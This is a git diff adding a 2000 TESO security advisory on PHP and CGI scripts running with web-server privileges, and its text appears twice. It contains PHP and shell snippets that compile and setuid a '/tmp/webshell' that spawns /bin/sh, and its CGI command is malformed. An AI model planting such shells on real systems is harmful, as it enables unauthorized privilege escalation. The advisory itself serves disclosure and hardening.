1 files changed, 48 insertions, 0 deletions
diff --git a/informationals/teso-i0007.txt b/informationals/teso-i0007.txt
new file mode 100644
index 0000000..8304c03
--- /dev/null
+++ b/informationals/teso-i0007.txt
@@ -0,0 +1,48 @@
+0007 2000/01/23  Conceptual bug in PHP and also in CGI modules
+==== TESO Informational =======================================================
+This piece of information is to be kept confidential.
+===============================================================================
+Description ..........: Bug in scripting modules for web servers
+Date .................: 2000/01/23 18:19
+Author ...............: hendy
+Publicity level ......: well known
+Affected .............: Unix http servers (maybe others)
+Type of entity .......: CGI+PHP
+Severity/Importance ..: low but interesting
+Found by .............: hendy
+Information ===================================================================
+If your httpd supports PHP and/or CGI scripts, and you allow users to use
+these, those scripts are run as the user/group the webserver runs as. Though
+this is mostly not user root, it can have impact if you have an own group.
+For example you allow group 'foo' to modify webserver configuration or the
+webserver needs access on some files (for example chat scripts, or messaging
+services via PHP/CGI). Every user with access on this machine can easily get
+access to this with little knowledge of scripting:
+(in PHP)
+<?
+    system("gcc ~user/shell.c -o /tmp/webshell");
+    system("chmod 4755 /tmp/webshell");
+?>
+Of course you have to let the webserver read ~/shell.c and shell.c does
+something like setuid(webserver); setgid(webgid); system("/bin/sh");
+If CGI scripts are supported its even more easy.
+#!/bin/sh
+gcc -o ~user/shell.c -o /tmp/webshell
+chmod 4755 /tmp/webshell
+Of course, this is only one possible idea of getting webservers privileges, but
+since this exploitation is possible on every standard Linux distribution, it
+should get somehow known, that giving the webuser more rights than it really
+needs, can be dangerous.
+==================================================================================

diff --git a/informationals/teso-i0007.txt b/informationals/teso-i0007.txt new file mode 100644 index 0000000..8304c03 --- /dev/null +++ b/informationals/teso-i0007.txt
@@ -0,0 +1,48 @@
	1	0007 2000/01/23 Conceptual bug in PHP and also in CGI modules
	2
	3	==== TESO Informational =======================================================
	4	This piece of information is to be kept confidential.
	5	===============================================================================
	6
	7	Description ..........: Bug in scripting modules for web servers
	8	Date .................: 2000/01/23 18:19
	9	Author ...............: hendy
	10	Publicity level ......: well known
	11	Affected .............: Unix http servers (maybe others)
	12	Type of entity .......: CGI+PHP
	13	Severity/Importance ..: low but interesting
	14	Found by .............: hendy
	15
	16	Information ===================================================================
	17
	18	If your httpd supports PHP and/or CGI scripts, and you allow users to use
	19	these, those scripts are run as the user/group the webserver runs as. Though
	20	this is mostly not user root, it can have impact if you have an own group.
	21	For example you allow group 'foo' to modify webserver configuration or the
	22	webserver needs access on some files (for example chat scripts, or messaging
	23	services via PHP/CGI). Every user with access on this machine can easily get
	24	access to this with little knowledge of scripting:
	25
	26	(in PHP)
	27
	28	<?
	29	system("gcc ~user/shell.c -o /tmp/webshell");
	30	system("chmod 4755 /tmp/webshell");
	31	?>
	32
	33	Of course you have to let the webserver read ~/shell.c and shell.c does
	34	something like setuid(webserver); setgid(webgid); system("/bin/sh");
	35
	36	If CGI scripts are supported its even more easy.
	37
	38	#!/bin/sh
	39	gcc -o ~user/shell.c -o /tmp/webshell
	40	chmod 4755 /tmp/webshell
	41
	42	Of course, this is only one possible idea of getting webservers privileges, but
	43	since this exploitation is possible on every standard Linux distribution, it
	44	should get somehow known, that giving the webuser more rights than it really
	45	needs, can be dangerous.
	46
	47	==================================================================================
	48